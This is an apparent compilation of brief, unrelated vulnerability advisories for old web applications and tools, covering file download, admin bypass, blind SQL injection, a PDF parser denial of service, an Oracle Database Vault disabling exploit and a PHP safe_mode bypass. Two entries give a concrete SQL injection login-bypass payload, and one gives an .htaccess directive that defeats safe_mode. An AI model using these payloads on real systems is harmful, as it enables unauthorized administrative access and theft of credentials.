Vcalendar_asp is vulnerable to an MDB file download vulnerability. An attacker can download the MDB file from the server and read the admin name and password from the 'users' table. The attacker can then use the credentials to log in to the application.
NATTERCHAT v1.1 is prone to an admin home bypass vulnerability. An attacker can exploit this issue to gain access to the administrative panel without authentication. This may lead to further attacks.
Denial of service occurs during parsing of included compressed streams (the bdc.exe /arc option must be used) because of the use of the /FlateDecode /ASCIIHexDecode compression options and the /JavaScript object tag in the PDF. From time to time, the result is either a DoS in which arithmetic registers are overwritten with the contents of the user's decrypted buffer, or an infinite loop during scanning. After modifying the stream buffer, we have such results: 775781CB 8B49 04 MOV ECX,DWORD PTR DS:[ECX+4] Access violation when reading [30333037] - use Shift+F7/F8/F9 to pass exception to program EAX 04354E20 ECX 30333033 EDX 30333033 EBX 01BF0000 ESP 0012D5B8 EBP 0012D5E0 ESI 04354E18 EDI 04352100 EIP 775781CB ntdll.775781CB
This exploit is used to disable the Oracle Database Vault runtime. It is tested on 10.2.0.3 and CentOS 5. It requires the user to have access to the oracle user process space and requires BFD headers and library (binutils-devel). It also requires ptrace() to be enabled and working.
ToursManager PhP Script is vulnerable to Blind SQL Injection. An attacker can inject malicious SQL queries in the 'tourid' parameter of the 'tourview.php' script. By manipulating the 'tourid' parameter, an attacker can execute arbitrary SQL queries in the application's database. This can be exploited to disclose sensitive information from the database, such as usernames and passwords.
Go to the Login page http://www.site.il/chat/nattechat/home.asp and enter Username: admin and Password: ' or '1'='1 to bypass authentication.
Go to the Login page http://www.exemple.ff/chat/nattechat/home.asp, enter Username: admin and Password: ' or '1'='1. This will bypass the login page as the query is always true.
The main problem is the difference between enabling safe_mode globally and declaring it via php_admin_flag. When a PHP script is created in /www/ and an attempt is made to call ini_set("error_log", "/hack/"), a warning is generated. However, if php_admin_flag safe_mode On is used in httpd.conf, only a warning is generated, and the .htaccess directive php_value error_log "/hack/blehx.php" is allowed and bypasses safe_mode.
wPortfolio is a free and open source web-based application written in PHP, designed to help you easily create and maintain your own portfolio website. A vulnerability exists in wPortfolio version 0.3 which allows an attacker to change the admin password. This can be exploited by sending a specially crafted HTTP POST request to the 'admin.php' script with the 'action' parameter set to 'change_password' and the 'password' parameter set to the new password.